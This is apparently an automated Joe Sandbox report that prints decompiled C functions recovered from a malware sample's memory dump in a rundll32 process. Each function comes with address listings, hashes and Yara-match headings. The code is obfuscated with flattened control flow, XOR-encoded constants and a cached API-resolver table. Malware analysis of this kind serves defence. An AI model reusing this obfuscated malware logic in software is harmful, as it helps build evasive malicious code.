				_v56 = 0x3b8b1c;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_v8 = 0xf9e323;
				_v8 = _v8 ^ 0x73816ffa;
				_v8 = _v8 + 0x5b26;
				_v8 = _v8 ^ 0x387262e7;
				_v8 = _v8 ^ 0x4b076809;
				_v20 = 0x75aab0;
				_v20 = _v20 ^ 0xc40c30fa;
				_v20 = _v20 + 0x78e9;
				_v20 = _v20 ^ 0xc4737271;
				_v16 = 0xa8e87a;
				_v16 = _v16 + 0xffff799a;
				_t99 = 0x33;
				_v16 = _v16 / _t99;
				_v16 = _v16 ^ 0x000fed3f;
				_v28 = 0x7feeb5;
				_v28 = _v28 + 0xffffe4f6;
				_v28 = _v28 ^ 0x007d0c9c;
				_v32 = 0x59c916;
				_t100 = 0x5d;
				_v32 = _v32 / _t100;
				_v32 = _v32 ^ 0x000d1fec;
				_v12 = 0x866588;
				_v12 = _v12 ^ 0x68ade4cb;
				_v12 = _v12 + 0xffffbaa5;
				_v12 = _v12 ^ 0x68223e43;
				_v36 = 0xbafac2;
				_v36 = _v36 ^ 0x5e34b155;
				_v36 = _v36 ^ 0x5e8c811c;
				_v24 = 0xc770cb;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x95635bf4;
				_v24 = _v24 ^ 0x956359d7;
				_v40 = 0xbd0b83;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x001e2563;
				_t101 = _v8;
				if(E00348F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
					_t95 =  &_v576;
					if(_v576 != 0) {
						while( *_t95 != 0x5c) {
							_t95 = _t95 + 2;
							if( *_t95 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t101 = 0;
						 *((short*)(_t95 + 2)) = 0;
					}
					L6:
					E0034DB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
				}
				return _v44;
			}




















                                                                                                                    0x0033ee8a
                                                                                                                    0x0033ee96
                                                                                                                    0x0033ee99
                                                                                                                    0x0033ee9c
                                                                                                                    0x0033ee9f
                                                                                                                    0x0033eea6
                                                                                                                    0x0033eead
                                                                                                                    0x0033eeb4
                                                                                                                    0x0033eebb
                                                                                                                    0x0033eec2
                                                                                                                    0x0033eec9
                                                                                                                    0x0033eed0
                                                                                                                    0x0033eed7
                                                                                                                    0x0033eede
                                                                                                                    0x0033eee5
                                                                                                                    0x0033eef1
                                                                                                                    0x0033eef6
                                                                                                                    0x0033eefb
                                                                                                                    0x0033ef02
                                                                                                                    0x0033ef09
                                                                                                                    0x0033ef10
                                                                                                                    0x0033ef17
                                                                                                                    0x0033ef21
                                                                                                                    0x0033ef2a
                                                                                                                    0x0033ef2d
                                                                                                                    0x0033ef34
                                                                                                                    0x0033ef3b
                                                                                                                    0x0033ef48
                                                                                                                    0x0033ef4f
                                                                                                                    0x0033ef56
                                                                                                                    0x0033ef5d
                                                                                                                    0x0033ef64
                                                                                                                    0x0033ef6b
                                                                                                                    0x0033ef72
                                                                                                                    0x0033ef76
                                                                                                                    0x0033ef7d
                                                                                                                    0x0033ef84
                                                                                                                    0x0033ef8b
                                                                                                                    0x0033ef8f
                                                                                                                    0x0033efa0
                                                                                                                    0x0033efad
                                                                                                                    0x0033efaf
                                                                                                                    0x0033efbc
                                                                                                                    0x0033efbe
                                                                                                                    0x0033efc4
                                                                                                                    0x0033efca
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033efcc
                                                                                                                    0x00000000
                                                                                                                    0x0033efca
                                                                                                                    0x0033efce
                                                                                                                    0x0033efd0
                                                                                                                    0x0033efd0
                                                                                                                    0x0033efd4
                                                                                                                    0x0033eff2
                                                                                                                    0x0033eff7
                                                                                                                    0x0033f001

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: C>"h$br8
                                                                                                                    • API String ID: 0-573140060
                                                                                                                    • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                    • Instruction ID: 87e33a298f30424f8c9349958a54c4894703588cf9f3b8124b68c3192269158d
                                                                                                                    • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                    • Instruction Fuzzy Hash: EF41F171C01219EBCF19CFE4C94A5EEBBB5FB04304F20819AE515B6260E3B45A55CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034AA30 Relevance: 2.6, Strings: 2, Instructions: 67COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E0034AA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t83;
				signed int _t85;
				signed int _t91;

				_v40 = _v40 & 0x00000000;
				_v48 = 0xea50c7;
				_v44 = 0x183406;
				_v8 = 0x4cb37c;
				_v8 = _v8 + 0xc736;
				_v8 = _v8 + 0xd4a7;
				_t91 = __edx;
				_t85 = 0x64;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 ^ 0x0dcd94f9;
				_v24 = 0x238f3e;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x011b8be3;
				_v20 = 0x73abc8;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x00035013;
				_v16 = 0x5012b6;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000aff4c;
				_v12 = 0x8c34bb;
				_v12 = _v12 | 0x8c5a3f77;
				_v12 = _v12 + 0xffff11fb;
				_v12 = _v12 ^ 0x2d4fbea1;
				_v12 = _v12 ^ 0xa19c1e56;
				_v36 = 0xff820a;
				_v36 = _v36 | 0x4fe4a4bc;
				_v36 = _v36 ^ 0x4ffdd4f4;
				_v32 = 0x36506a;
				_v32 = _v32 + 0x4de;
				_v32 = _v32 ^ 0x003709b9;
				_v28 = 0x64fd3b;
				_v28 = _v28 + 0xffff3e7a;
				_v28 = _v28 ^ 0x00656766;
				if( *((intOrPtr*)(0x353210 + __edx * 4)) == 0) {
					_t83 = E00340A0E(_t85, _t85, _a4);
					_push(_v28);
					_push(_a12);
					_push(_v32);
					_push(_t83);
					 *((intOrPtr*)(0x353210 + _t91 * 4)) = E0033CDCD(_v12, _v36);
				}
				return  *((intOrPtr*)(0x353210 + _t91 * 4));
			}

















                                                                                                                    0x0034aa36
                                                                                                                    0x0034aa3a
                                                                                                                    0x0034aa41
                                                                                                                    0x0034aa48
                                                                                                                    0x0034aa4f
                                                                                                                    0x0034aa56
                                                                                                                    0x0034aa62
                                                                                                                    0x0034aa68
                                                                                                                    0x0034aa69
                                                                                                                    0x0034aa6c
                                                                                                                    0x0034aa73
                                                                                                                    0x0034aa7a
                                                                                                                    0x0034aa7e
                                                                                                                    0x0034aa85
                                                                                                                    0x0034aa8c
                                                                                                                    0x0034aa90
                                                                                                                    0x0034aa97
                                                                                                                    0x0034aa9e
                                                                                                                    0x0034aaa7
                                                                                                                    0x0034aaaa
                                                                                                                    0x0034aab1
                                                                                                                    0x0034aab8
                                                                                                                    0x0034aabf
                                                                                                                    0x0034aac6
                                                                                                                    0x0034aacd
                                                                                                                    0x0034aad4
                                                                                                                    0x0034aadb
                                                                                                                    0x0034aae2
                                                                                                                    0x0034aae9
                                                                                                                    0x0034aaf0
                                                                                                                    0x0034aaf7
                                                                                                                    0x0034aafe
                                                                                                                    0x0034ab05
                                                                                                                    0x0034ab0c
                                                                                                                    0x0034ab1b
                                                                                                                    0x0034ab2e
                                                                                                                    0x0034ab33
                                                                                                                    0x0034ab36
                                                                                                                    0x0034ab39
                                                                                                                    0x0034ab42
                                                                                                                    0x0034ab4b
                                                                                                                    0x0034ab4b
                                                                                                                    0x0034ab5d

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fge$jP6
                                                                                                                    • API String ID: 0-775479084
                                                                                                                    • Opcode ID: 73c0522a7b609cca3d9fb336043a2f1c787997cd41cdd47b2cae852ec690eb70
                                                                                                                    • Instruction ID: 03ac8fb45da7a951246a12d8ad072576a51c0b27fb492a32d1800fb02659cb59
                                                                                                                    • Opcode Fuzzy Hash: 73c0522a7b609cca3d9fb336043a2f1c787997cd41cdd47b2cae852ec690eb70
                                                                                                                    • Instruction Fuzzy Hash: E531E0B1C00309EBCB49CFA4CA4A59EBBB5FB08308F108548D511B6220C3B95A49CF96
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00350E3A Relevance: 2.6, Strings: 2, Instructions: 61COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00350E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t61;
				intOrPtr _t66;
				void* _t73;
				intOrPtr* _t74;

				_t74 = _a16;
				_push(_t74);
				_push(_a12);
				_t73 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003420B9(_t61);
				_v16 = 0x2b4f5d;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000abada;
				_v24 = 0x6f176d;
				_v24 = _v24 | 0x8892b5fd;
				_v24 = _v24 ^ 0x88fd6dba;
				_v12 = 0x9049ef;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x7aa47b64;
				_v12 = _v12 ^ 0x7aa68413;
				_a16 = 0x9c064;
				_a16 = _a16 + 0x4e6a;
				_a16 = _a16 + 0xffffd44e;
				_a16 = _a16 | 0x475ceb65;
				_a16 = _a16 ^ 0x47532e3d;
				_v8 = 0xaf6c6f;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xad29;
				_v8 = _v8 + 0xd52;
				_v8 = _v8 ^ 0x000b7d9e;
				_v20 = 0xd79f7b;
				_v20 = _v20 ^ 0x214a9efd;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x010f9d8f;
				E00340DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
				E0033ED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
				_t66 =  *((intOrPtr*)(_t74 + 4));
				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
				return _t66;
			}












                                                                                                                    0x00350e41
                                                                                                                    0x00350e45
                                                                                                                    0x00350e46
                                                                                                                    0x00350e49
                                                                                                                    0x00350e4b
                                                                                                                    0x00350e4e
                                                                                                                    0x00350e52
                                                                                                                    0x00350e53
                                                                                                                    0x00350e58
                                                                                                                    0x00350e65
                                                                                                                    0x00350e68
                                                                                                                    0x00350e6c
                                                                                                                    0x00350e73
                                                                                                                    0x00350e7a
                                                                                                                    0x00350e81
                                                                                                                    0x00350e88
                                                                                                                    0x00350e8f
                                                                                                                    0x00350e93
                                                                                                                    0x00350e9a
                                                                                                                    0x00350ea1
                                                                                                                    0x00350ea8
                                                                                                                    0x00350eaf
                                                                                                                    0x00350eb6
                                                                                                                    0x00350ebd
                                                                                                                    0x00350ec4
                                                                                                                    0x00350ecb
                                                                                                                    0x00350ecf
                                                                                                                    0x00350ed6
                                                                                                                    0x00350edd
                                                                                                                    0x00350ee4
                                                                                                                    0x00350eeb
                                                                                                                    0x00350ef2
                                                                                                                    0x00350ef6
                                                                                                                    0x00350f0c
                                                                                                                    0x00350f1f
                                                                                                                    0x00350f24
                                                                                                                    0x00350f2a
                                                                                                                    0x00350f32

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =.SG$]O+
                                                                                                                    • API String ID: 0-348654084
                                                                                                                    • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                    • Instruction ID: bc0abe7e65afe3ff2ad5141280fd234cb45d933abcb5e856a759655579765357
                                                                                                                    • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                    • Instruction Fuzzy Hash: D721167180120DEFCF45DFE4DA464AEBBB1FF45304F108559E91566225C3719B24DFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 431132790-0
                                                                                                                    • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                    • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                    • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                    • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034044F Relevance: 1.5, Strings: 1, Instructions: 287COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E0034044F() {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t309;
				intOrPtr _t310;
				void* _t311;
				intOrPtr _t321;
				intOrPtr _t325;
				void* _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr _t369;
				void* _t373;
				intOrPtr _t374;
				void* _t379;
				signed int* _t383;

				_t383 =  &_v140;
				_v16 = 0x8f0e94;
				_v12 = 0x9bdfd3;
				_t329 = 0;
				_v8 = _v8 & 0;
				_v4 = _v4 & 0;
				_v68 = 0xf0a33d;
				_v68 = _v68 ^ 0x64690d06;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x00c9335c;
				_v96 = 0x45a6c;
				_v96 = _v96 + 0xffff2947;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x00000003;
				_v56 = 0xab09eb;
				_v56 = _v56 | 0x7e070137;
				_v56 = _v56 ^ 0x7eaf09ff;
				_v80 = 0xa0f766;
				_v80 = _v80 | 0xafeefcb7;
				_v80 = _v80 ^ 0xafeefff7;
				_v48 = 0xf26de0;
				_v48 = _v48 + 0xffff1ff1;
				_v48 = _v48 ^ 0x00f18dd1;
				_v76 = 0x20d89d;
				_v76 = _v76 + 0xffff51c8;
				_v76 = _v76 | 0xd50d8457;
				_v76 = _v76 ^ 0xd52cfd33;
				_v136 = 0x1fce72;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 | 0xd51e44d2;
				_t331 = 7;
				_v136 = _v136 / _t331;
				_v136 = _v136 ^ 0x1e7b1fff;
				_t379 = 0x1e2498b;
				_v92 = 0x2fa0bb;
				_v92 = _v92 >> 7;
				_v92 = _v92 << 1;
				_v92 = _v92 ^ 0x0000a534;
				_v52 = 0x3913b;
				_t332 = 0x4f;
				_v52 = _v52 / _t332;
				_v52 = _v52 ^ 0x00068b65;
				_v104 = 0xfffd78;
				_v104 = _v104 | 0x3b05e9e1;
				_v104 = _v104 + 0x741e;
				_v104 = _v104 ^ 0x7591a7da;
				_v104 = _v104 ^ 0x4990882f;
				_v84 = 0xe3d15a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0xbeb387df;
				_v84 = _v84 ^ 0x5d62ae1e;
				_v24 = 0xb3d42d;
				_v24 = _v24 | 0x6ee5a57e;
				_v24 = _v24 ^ 0x6efe8c67;
				_v60 = 0x6708ad;
				_v60 = _v60 + 0xd3fd;
				_v60 = _v60 ^ 0x0061923e;
				_v128 = 0x5551d4;
				_t333 = 0x50;
				_v128 = _v128 / _t333;
				_t334 = 0x7a;
				_v128 = _v128 / _t334;
				_t335 = 0x7e;
				_v128 = _v128 * 0x46;
				_v128 = _v128 ^ 0x000c63e9;
				_v28 = 0xd668f8;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0x68f34519;
				_v112 = 0x194a18;
				_v112 = _v112 / _t335;
				_v112 = _v112 | 0xa7c33fbe;
				_t336 = 0x65;
				_v112 = _v112 / _t336;
				_v112 = _v112 ^ 0x01a285cf;
				_v44 = 0xc79794;
				_v44 = _v44 ^ 0x35aba003;
				_v44 = _v44 ^ 0x356e5b19;
				_v140 = 0x380362;
				_t337 = 0x79;
				_v140 = _v140 * 5;
				_v140 = _v140 ^ 0x1d7b2daf;
				_v140 = _v140 + 0x590f;
				_v140 = _v140 ^ 0x1c6cd8ab;
				_v120 = 0x1c8328;
				_v120 = _v120 / _t337;
				_t338 = 0xa;
				_v120 = _v120 / _t338;
				_v120 = _v120 | 0x9d020d0f;
				_v120 = _v120 ^ 0x9d02076d;
				_v124 = 0x55cbd6;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 >> 6;
				_v124 = _v124 ^ 0x000fb83a;
				_v132 = 0xf0ac8c;
				_v132 = _v132 | 0x3804c269;
				_v132 = _v132 >> 1;
				_v132 = _v132 + 0xffff8da8;
				_v132 = _v132 ^ 0x1c781e64;
				_v88 = 0x7992e8;
				_v88 = _v88 | 0xba3027fa;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x0051fda0;
				_v36 = 0x7aefbd;
				_v36 = _v36 + 0xfffff4eb;
				_v36 = _v36 ^ 0x0078a7fc;
				_v40 = 0xf56b46;
				_v40 = _v40 + 0xffff9ce0;
				_v40 = _v40 ^ 0x00fe48d4;
				_v108 = 0x27569f;
				_v108 = _v108 + 0x2c0a;
				_v108 = _v108 ^ 0xb442ac8c;
				_v108 = _v108 ^ 0xdc856b2a;
				_v108 = _v108 ^ 0x68e3c0da;
				_v116 = 0xbcba21;
				_v116 = _v116 << 0xd;
				_v116 = _v116 << 8;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x011b605a;
				_v32 = 0x87c31e;
				_v32 = _v32 ^ 0x05bc26b1;
				_v32 = _v32 ^ 0x05363b16;
				_v100 = 0x4be1cd;
				_v100 = _v100 + 0xffff13dd;
				_v100 = _v100 | 0xdbf19b4f;
				_v100 = _v100 >> 7;
				_v100 = _v100 ^ 0x01b90151;
				_v64 = 0xb1223e;
				_v64 = _v64 | 0xb1fef6fe;
				_v64 = _v64 ^ 0xb1f65c82;
				_v72 = 0x9ef2a7;
				_v72 = _v72 * 0x66;
				_v72 = _v72 + 0xffffefd1;
				_v72 = _v72 ^ 0x3f51caaf;
				while(1) {
					L1:
					while(1) {
						_t309 = 0x546d98;
						do {
							L3:
							if(_t379 == _t309) {
								_t310 =  *0x353e00; // 0x0
								_t339 = _v56;
								_t311 = E00340DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
								_t383 =  &(_t383[6]);
								__eflags = _t311 - _v80;
								if(__eflags != 0) {
									_t379 = 0x64eb485;
									goto L14;
								} else {
									_t379 = 0xb6ab68a;
									_t329 = 1;
									goto L1;
								}
							} else {
								if(_t379 == 0x19763e8) {
									_push(_v128);
									_push(_v60);
									__eflags = E00339462(E0034DCF7(_v24, 0x3317f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
									_t339 = _v140;
									_t379 =  ==  ? 0x546d98 : 0x64eb485;
									E0033A8B0(_t339, _t313, _v120);
									_t383 =  &(_t383[8]);
									L14:
									_t369 =  *0x353e00; // 0x0
									_t309 = 0x546d98;
									goto L15;
								} else {
									if(_t379 == 0x1e2498b) {
										_push(_t339);
										_push(_t339);
										_t373 = 0x28;
										_t321 = E00337FF2(_t373);
										 *0x353e00 = _t321;
										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
										_t374 =  *0x353e00; // 0x0
										_t325 = E00337FF2( *((intOrPtr*)(_t374 + 0x14)));
										_t369 =  *0x353e00; // 0x0
										_t379 = 0x19763e8;
										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
										 *(_t369 + 4) = _t339;
										_t309 = 0x546d98;
										continue;
									} else {
										if(_t379 == 0x64eb485) {
											E00348519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
											E00348519(_v64, _v72,  *0x353e00);
										} else {
											if(_t379 != 0xb6ab68a) {
												goto L15;
											} else {
												E0033957D(_v20, _v40, _v108, _v48, _v116);
											}
										}
									}
								}
							}
							L18:
							return _t329;
							L15:
							__eflags = _t379 - 0xfde45c5;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}


























































                                                                                                                    0x0034044f
                                                                                                                    0x00340459
                                                                                                                    0x00340466
                                                                                                                    0x00340471
                                                                                                                    0x00340473
                                                                                                                    0x0034047a
                                                                                                                    0x00340481
                                                                                                                    0x00340489
                                                                                                                    0x00340491
                                                                                                                    0x00340496
                                                                                                                    0x0034049e
                                                                                                                    0x003404a6
                                                                                                                    0x003404ae
                                                                                                                    0x003404b3
                                                                                                                    0x003404b8
                                                                                                                    0x003404c0
                                                                                                                    0x003404c8
                                                                                                                    0x003404d0
                                                                                                                    0x003404d8
                                                                                                                    0x003404e0
                                                                                                                    0x003404e8
                                                                                                                    0x003404f0
                                                                                                                    0x003404f8
                                                                                                                    0x00340500
                                                                                                                    0x00340508
                                                                                                                    0x00340510
                                                                                                                    0x00340518
                                                                                                                    0x00340520
                                                                                                                    0x00340528
                                                                                                                    0x0034052d
                                                                                                                    0x0034053b
                                                                                                                    0x00340540
                                                                                                                    0x00340546
                                                                                                                    0x0034054e
                                                                                                                    0x00340553
                                                                                                                    0x0034055b
                                                                                                                    0x00340560
                                                                                                                    0x00340564
                                                                                                                    0x0034056c
                                                                                                                    0x00340578
                                                                                                                    0x0034057d
                                                                                                                    0x00340583
                                                                                                                    0x0034058b
                                                                                                                    0x00340593
                                                                                                                    0x0034059b
                                                                                                                    0x003405a3
                                                                                                                    0x003405ab
                                                                                                                    0x003405b3
                                                                                                                    0x003405bb
                                                                                                                    0x003405c0
                                                                                                                    0x003405c8
                                                                                                                    0x003405d0
                                                                                                                    0x003405db
                                                                                                                    0x003405e6
                                                                                                                    0x003405f1
                                                                                                                    0x003405f9
                                                                                                                    0x00340601
                                                                                                                    0x00340609
                                                                                                                    0x00340615
                                                                                                                    0x0034061a
                                                                                                                    0x00340624
                                                                                                                    0x00340627
                                                                                                                    0x00340634
                                                                                                                    0x00340637
                                                                                                                    0x0034063b
                                                                                                                    0x00340643
                                                                                                                    0x0034064e
                                                                                                                    0x00340656
                                                                                                                    0x00340661
                                                                                                                    0x00340671
                                                                                                                    0x00340675
                                                                                                                    0x00340681
                                                                                                                    0x00340686
                                                                                                                    0x0034068c
                                                                                                                    0x00340694
                                                                                                                    0x0034069c
                                                                                                                    0x003406a4
                                                                                                                    0x003406ac
                                                                                                                    0x003406b9
                                                                                                                    0x003406bc
                                                                                                                    0x003406c0
                                                                                                                    0x003406c8
                                                                                                                    0x003406d0
                                                                                                                    0x003406d8
                                                                                                                    0x003406e8
                                                                                                                    0x003406f0
                                                                                                                    0x003406f3
                                                                                                                    0x003406f7
                                                                                                                    0x003406ff
                                                                                                                    0x00340707
                                                                                                                    0x0034070f
                                                                                                                    0x00340714
                                                                                                                    0x00340719
                                                                                                                    0x0034071e
                                                                                                                    0x00340726
                                                                                                                    0x0034072e
                                                                                                                    0x00340736
                                                                                                                    0x0034073a
                                                                                                                    0x00340742
                                                                                                                    0x0034074a
                                                                                                                    0x00340752
                                                                                                                    0x0034075a
                                                                                                                    0x0034075f
                                                                                                                    0x00340767
                                                                                                                    0x0034076f
                                                                                                                    0x00340777
                                                                                                                    0x0034077f
                                                                                                                    0x00340787
                                                                                                                    0x0034078f
                                                                                                                    0x00340797
                                                                                                                    0x0034079f
                                                                                                                    0x003407a7
                                                                                                                    0x003407af
                                                                                                                    0x003407b7
                                                                                                                    0x003407bf
                                                                                                                    0x003407c7
                                                                                                                    0x003407cc
                                                                                                                    0x003407d1
                                                                                                                    0x003407d6
                                                                                                                    0x003407de
                                                                                                                    0x003407e6
                                                                                                                    0x003407ee
                                                                                                                    0x003407f6
                                                                                                                    0x003407fe
                                                                                                                    0x00340806
                                                                                                                    0x0034080e
                                                                                                                    0x00340818
                                                                                                                    0x00340820
                                                                                                                    0x00340828
                                                                                                                    0x00340830
                                                                                                                    0x00340838
                                                                                                                    0x00340845
                                                                                                                    0x00340849
                                                                                                                    0x00340851
                                                                                                                    0x00340859
                                                                                                                    0x00340859
                                                                                                                    0x0034085f
                                                                                                                    0x0034085f
                                                                                                                    0x00340864
                                                                                                                    0x00340864
                                                                                                                    0x00340866
                                                                                                                    0x00340985
                                                                                                                    0x0034099f
                                                                                                                    0x003409a3
                                                                                                                    0x003409a8
                                                                                                                    0x003409ab
                                                                                                                    0x003409af
                                                                                                                    0x003409be
                                                                                                                    0x00000000
                                                                                                                    0x003409b1
                                                                                                                    0x003409b3
                                                                                                                    0x003409b8
                                                                                                                    0x00000000
                                                                                                                    0x003409b8
                                                                                                                    0x0034086c
                                                                                                                    0x00340872
                                                                                                                    0x0034091a
                                                                                                                    0x00340923
                                                                                                                    0x00340963
                                                                                                                    0x00340967
                                                                                                                    0x00340970
                                                                                                                    0x00340973
                                                                                                                    0x00340978
                                                                                                                    0x003409c0
                                                                                                                    0x003409c0
                                                                                                                    0x003409c6
                                                                                                                    0x00000000
                                                                                                                    0x00340878
                                                                                                                    0x0034087e
                                                                                                                    0x003408c7
                                                                                                                    0x003408c8
                                                                                                                    0x003408cb
                                                                                                                    0x003408cc
                                                                                                                    0x003408d1
                                                                                                                    0x003408d6
                                                                                                                    0x003408e9
                                                                                                                    0x003408f2
                                                                                                                    0x003408f7
                                                                                                                    0x003408fd
                                                                                                                    0x00340907
                                                                                                                    0x00340909
